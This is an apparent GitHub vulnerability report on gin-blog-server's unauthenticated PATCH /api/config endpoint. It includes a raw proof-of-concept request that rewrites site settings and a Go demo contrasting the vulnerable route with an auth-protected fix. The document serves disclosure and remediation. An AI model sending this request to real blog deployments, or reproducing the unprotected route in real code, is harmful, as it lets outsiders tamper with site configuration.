
Vulnerability in /api/config due to Missing Authentication Allowing Configuration Tampering #28

@Tritium0041



Vulnerability in /api/config due to Missing Authentication Allowing Configuration Tampering

Location of the Vulnerability:

  • gin-blog-server/internal/manager.go in the base.PATCH("/config", blogInfoAPI.UpdateConfig) function.

Impact:

  • Unauthorized attackers can arbitrarily modify the core configuration of the website.

Vulnerability Description:

  • The UpdateConfig API is incorrectly placed in the unauthenticated route group base. This allows attackers to directly craft requests to tamper with the website's configuration information (such as the website name, record number, comment moderation switch, etc.). This can lead to data pollution, security mechanism failure, or service disruption.

Attack Scenario:

  • An attacker can send a carefully crafted PATCH /api/config request to directly modify the server's configuration without needing to log in or pass any authentication checks.

POC (Proof of Concept):

PATCH /api/config HTTP/1.1
Host: localhost
Content-Type: application/json
Content-Length: 141

{
  "website_record":"1111",
  "is_comment_review":"false",
  "is_message_review":"false",
  "website_name":"hacked",
  "website_author":"hacker"
}

[screenshot: the PoC request]
Result:
[screenshot: the response after the request]
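The route-group mistake the report describes, reproduced as an added example that is not the gin-blog project's own code. To keep it dependency-free it uses net/http and httptest instead of Gin: the `vulnerable` router registers the PATCH handler on the open group exactly as the issue describes, the fixed router wraps the same handler in an auth middleware. The `SiteConfig` field names are taken from the PoC body; `requireAdmin`, `adminToken` and the in-memory `configStore` are assumptions standing in for the project's JWT middleware and database. `sendPoC` replays the issue's request and reports the status code and the resulting `website_name`, so the same function doubles as a regression test for the fix.

```go
package main

import (
	"encoding/json"
	"fmt"
	"io"
	"net/http"
	"net/http/httptest"
	"strings"
	"sync"
)

// SiteConfig holds the fields the PoC tampers with (JSON names copied from the PoC body).
type SiteConfig struct {
	WebsiteRecord   string `json:"website_record"`
	IsCommentReview string `json:"is_comment_review"`
	IsMessageReview string `json:"is_message_review"`
	WebsiteName     string `json:"website_name"`
	WebsiteAuthor   string `json:"website_author"`
}

// configStore is a hypothetical in-memory stand-in for the blog's config table.
type configStore struct {
	mu  sync.Mutex
	cfg SiteConfig
}

// updateConfig does what a handler like UpdateConfig does: decode the body and persist it.
// It performs no authorization itself; that is the job of the route group it is mounted on.
func (s *configStore) updateConfig(w http.ResponseWriter, r *http.Request) {
	var in SiteConfig
	if err := json.NewDecoder(io.LimitReader(r.Body, 1<<16)).Decode(&in); err != nil {
		http.Error(w, "bad json", http.StatusBadRequest)
		return
	}
	s.mu.Lock()
	s.cfg = in
	s.mu.Unlock()
	w.WriteHeader(http.StatusOK)
}

// adminToken is a constructed bearer token for the demo; the real project uses JWT middleware.
const adminToken = "example-admin-token"

// requireAdmin is a hypothetical auth middleware: reject anything without the admin token.
func requireAdmin(next http.Handler) http.Handler {
	return http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
		if r.Header.Get("Authorization") != "Bearer "+adminToken {
			http.Error(w, "unauthorized", http.StatusUnauthorized)
			return
		}
		next.ServeHTTP(w, r)
	})
}

// newRouter builds the /api routes. vulnerable=true reproduces the bug from the issue:
// PATCH /api/config registered on the public group, with no auth wrapper around it.
func newRouter(s *configStore, vulnerable bool) http.Handler {
	mux := http.NewServeMux()
	patchOnly := http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
		if r.Method != http.MethodPatch {
			http.Error(w, "method not allowed", http.StatusMethodNotAllowed)
			return
		}
		s.updateConfig(w, r)
	})
	if vulnerable {
		mux.Handle("/api/config", patchOnly) // bug: reachable by anyone
	} else {
		mux.Handle("/api/config", requireAdmin(patchOnly)) // fix: behind the admin middleware
	}
	return mux
}

// sendPoC replays the issue's PATCH request against h (with an optional bearer token)
// and returns the HTTP status plus the website_name left in the store afterwards.
func sendPoC(h http.Handler, s *configStore, token string) (int, string) {
	body := `{"website_record":"1111","is_comment_review":"false","is_message_review":"false","website_name":"hacked","website_author":"hacker"}`
	req := httptest.NewRequest(http.MethodPatch, "/api/config", strings.NewReader(body))
	req.Header.Set("Content-Type", "application/json")
	if token != "" {
		req.Header.Set("Authorization", "Bearer "+token)
	}
	rec := httptest.NewRecorder()
	h.ServeHTTP(rec, req)
	s.mu.Lock()
	defer s.mu.Unlock()
	return rec.Code, s.cfg.WebsiteName
}

func main() {
	for _, vuln := range []bool{true, false} {
		s := &configStore{cfg: SiteConfig{WebsiteName: "my-blog"}}
		code, name := sendPoC(newRouter(s, vuln), s, "")
		fmt.Printf("vulnerable=%v unauthenticated PATCH -> %d, website_name=%q\n", vuln, code, name)
	}
}
```

Against the vulnerable router the unauthenticated request returns 200 and the stored `website_name` becomes `hacked`; against the fixed router it returns 401 and the configuration is untouched, while the same request with the admin token still succeeds. The practical lesson is that authorization for a mutating endpoint should live in the route group it is registered on, and that a test like `sendPoC` with no token is the cheapest way to catch a handler that has drifted onto the wrong group.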
